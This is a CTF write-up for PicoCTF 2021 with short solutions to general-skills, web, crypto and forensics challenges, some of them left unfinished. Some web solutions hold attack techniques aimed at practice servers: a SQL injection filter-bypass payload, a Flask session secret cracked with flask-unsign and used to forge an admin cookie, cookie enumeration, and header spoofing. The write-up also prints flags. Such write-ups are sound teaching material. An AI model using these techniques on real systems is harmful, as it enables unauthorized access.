PicoCTF 2021

Introduction

General Skills

Obedient Cat

Downloading the flag file we will get the flag!

Python Wrangling

We need to download 3 files

- ende.py  
- flag.txt.en  
- pw.txt

To solve it just run the python script like below 

#Run
python3 ende.py -d flag.txt.en

#Password
- You can get from pw.txt

Wave A Flag

Download the file and since this is a binary do the steps beloww

#Steps
1. chmod +x warm
2. ./warm #We will see -h
3. ./warm -h #Get the flag

Nice Netcat ...

Netcat to the server will get us output like this

112 from decimal will get us p so we need to convert all of this to a flag format. Let's do it in a one-liner way :)

#Commands
for i in `nc mercury.picoctf.net 21135`; do printf \\$(printf "%o" $i);done;

Static ain't always noise

Downloading the files you can just strings the files and get the flag but the intended way is to run the bash script with the static file as argument T

#Way 1
strings static | grep -i "pico"

#Way2
chmod +x static
chmod +x ltdis.sh
./ltdis.sh ./static
strings static.ltdis.* | grep -i "pico"

Tab, Tab, Attack

Downloading the files and unzip them will looks like this

So let's recursively grep the flag format

grep -aRi "pico" .

Magikarp Ground Session

Make sure to click Launch Instance first

Let's connect first to ssh 

ssh ctf-player@venus.picoctf.net -p PORT

We need to find all of the 3 flags . This commands would help us

#Find All Flags
find / -type f -name '*of3.flag.txt' 2>/dev/null

#Strings all Flags
for i in $(find / -type f -name '*of3.flag.txt' 2>/dev/null); do cat $i;done

Web Exploitation

Ancient History

Looking at the page source. There is a lot of javascript. There is a lot of repeated javascript. But the url actually make us curious why its showing ?p so looking at the source code we found this

Let's use regex and grep this and combine as a flag

1. copy all of the content in index.html to flag.txt
2. cat flag.txt | grep -oP "[^'](?=\'\))" | tr "\n" " " | sed -s 's/ //g'

GET aHEAD

Going into the page we will see this

Since it saying head let's try show document info only

curl -I http://mercury.picoctf.net:PORT/index.php

Cookies

Playing with the web we found out that the cookie name can be manipulated to show different cookies. I love script >.< 

for i in {0..30};do echo "Name="$i" ";curl -s -L http://mercury.picoctf.net:PORT/check --cookie "name=$i" | grep -oP  '(?<=<b>).*?(?=</b>)';done

Using name=18 will get us the flag

curl -s -L http://mercury.picoctf.net:29649/check --cookie "name=18"

Scavenger Hunt

Opening the website we will see this

The first part we can get from the source code

The second part we can get in the css file

The third part we can get in /robots.txt

The fourth part we can get in .htaccess

The last part we can take a look at .DS_Store

#Flag
picoCTF{th4ts_4_l0t_0f_pl4c3s_2_lO0k_fa04427c}

Who are you?

Looking at the web page we can see that it is required for us to use Pico Browser

As we manage to use PicoBrowser Agents we encounter another one which we need to access from trusted website only.

curl -A "PicoBrowser" http://mercury.picoctf.net:PORT/

Also we manage to solve that but got another problem. Which this site is only worked in 2018. 

curl -A "PicoBrowser" -H "Referer: http://mercury.picoctf.net:46199/" -H "Date: Sun Nov  6 08:49:37 2018" http://mercury.picoctf.net:PORT/

Okay we got another problem. We need to ensure that we cant be tracked to access the page.

curl -A "PicoBrowser" -H "Referer: http://mercury.picoctf.net:46199/" -H "Date: Sun Nov  6 08:49:37 2018" -H "DNT: 1" http://mercury.picoctf.net:PORT/

Reallly... We need to solve another problem which this site only for people from Sweden

Some Assembly Required 1

It is my Birthday

To solve it we just need to give 2 pdf file with the same MD5 hash value.

echo '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2' | xxd -r -p > 1.pdf
echo '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2' | xxd -r -p > 2.pdf

Some Assembly Required 2

Open the web page and set breakpoints at line 34 and then check the web assembly

Which at the end we will see a possible flag?

Trying bruteforce XOR will get us the flag 

picoCTF{15021d97ae0a401788600c815fb1caef}

Super Serial

Going into the web page we can see a login page.

Most Cookies

Looking at the page it almost same like before this

Trying to input snickerdoodle it give us a new session which after decode from base64 we will see this

The description of the challenge tell us about flask and the files that we download contains the secret key 

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
app.secret_key = random.choice(cookie_names)

To get the flag we need to change the value of "very_auth" into admin

#List Of Cookies
snickerdoodle
chocolate chip
oatmeal raisin
gingersnap
shortbread
peanut butter
whoopie pie
sugar
molasses
kiss
biscotti
butter
spritz
snowball
drop
thumbprint
pinwheel
wafer
macaroon
fortune
crinkle
icebox
gingerbread
tassie
lebkuchen
macaron
black and white
white chocolate macadamia

#Bruteforce unsign
#Install
python3 -m pip install flask-unsign 

#Bruteforce
flask-unsign --unsign --wordlist /opt/Word/rockyou.txt --cookie 'eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFKkcA.K7FHGc9hV_qtRQEvnyJZgChNwtA' --no-literal-eval
- Found gingerbread

#Sign
flask-unsign --sign --cookie "{'very_auth': 'admin'}" --secret 'gingerbread'
- Get eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFKmZQ.t--tirgJeAXk8CMoA00b0VEz31A

Change the session and we will get the flag!

Some Assembly Required 3

Set breakpoints at line 34 and we check this web assembly

But we can't do the same things in here. So let's save the file and save it as file.wasm and use wasm2c to convert it to c

#Installing
git clone https://github.com/WebAssembly/wabt.git
cd wabt
make

#Commmands
cd bin
./wasm2c webasm3.wasm -o webasm3.c

#What we can get
static const u8 data_segment_data_0[] = { #Referring to i32.const 1024
  0x9d, 0x6e, 0x93, 0xc8, 0xb2, 0xb9, 0x41, 0x8b, 0x94, 0xc6, 0xdf, 0x33, 
  0xc0, 0xc5, 0x95, 0xde, 0x37, 0xc3, 0x9f, 0x93, 0xdf, 0x3f, 0xc9, 0xc3, 
  0xc2, 0x8c, 0x32, 0x93, 0x90, 0xc1, 0x8e, 0x65, 0x95, 0x9f, 0xc2, 0x8c, 
  0x36, 0xc8, 0x95, 0xc0, 0x90, 0x00, 0x00, 
};

static const u8 data_segment_data_1[] = { #Referring to i32.const 106
  0xf1, 0xa7, 0xf0, 0x07, 0xed, 
};

Since we know that the flag should be picoctf{ so what we did is check how the hex 0x9d can get into p

So actually it xor from left to right with the key that we have to here is a simple script to help us get the flag

flag = [0x9d, 0x6e, 0x93, 0xc8, 0xb2, 0xb9, 0x41, 0x8b, 0x94, 0xc6, 0xdf, 0x33, 
  0xc0, 0xc5, 0x95, 0xde, 0x37, 0xc3, 0x9f, 0x93, 0xdf, 0x3f, 0xc9, 0xc3, 
  0xc2, 0x8c, 0x32, 0x93, 0x90, 0xc1, 0x8e, 0x65, 0x95, 0x9f, 0xc2, 0x8c, 
  0x36, 0xc8, 0x95, 0xc0, 0x90, 0x00, 0x00]
key = [0xed, 0x07,0xf0,0xa7,0xf1]
index= 0
real_flag =""
for i in flag:
	if index > 4:
		index = 0	
	real_flag+= chr(i^key[index])
	index +=1
print(real_flag)

Web Gauntlet 2

When we open the page we will see a login page and input guest:guest give us a SQL Query behind

#Filter
or and true false union like = > < ; -- /* */ admin

#Original
SELECT username, password FROM users WHERE username='$input' AND password='$input'

#Payload 
SELECT username, password FROM users WHERE username=''||'admi'||'n'||'' AND password='$input'

Startup Company

Some Assembly Required 4

Save the web asm we found and convert it using wasm2c

#What we found
static const u8 data_segment_data_0[] = {
  0x18, 0x6a, 0x7c, 0x61, 0x11, 0x38, 0x69, 0x37, 0x5b, 0x48, 0x7e, 0x4a, 
  0x68, 0x5e, 0x4b, 0x6f, 0x1f, 0x5d, 0x5c, 0x77, 0x34, 0x6b, 0x50, 0x15, 
  0x70, 0x4f, 0x3f, 0x5c, 0x45, 0x6f, 0x14, 0x06, 0x05, 0x7d, 0x3e, 0x3d, 
  0x04, 0x16, 0x2e, 0x12, 0x4c, 0x00, 0x00, 
};

Cryptography

Mod 26

This challenge can easily solved using Cyberchef which is recipe of ROT13.

#Given
cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_hyLicInt}

#ROT13
picoCTF{next_time_I'll_try_2_rounds_of_rot13_ulYvpVag}

Pixelated

We are give 2 images in png format. This challenge can be solve by merge both images using StegSolve!

#To Install
wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar

Forensics

Information

Trying exiftool on the image we will find the flag

Weird File

Since this is a macro word file we can try open it and view the macros code

#Commands
echo "cGljb0NURnttNGNyMHNfcl9kNG5nM3IwdXN9" | base64 -d

#Flag
picoCTF{m4cr0s_r_d4ng3r0us}

Matryoshka Doll

Unzip the files all the way and you will get the flag

picoCTF{4f11048e83ffc7d342a15bd2309b47de}

Reverse Engineering

PreviousNahamCon CTF 2021

Last updated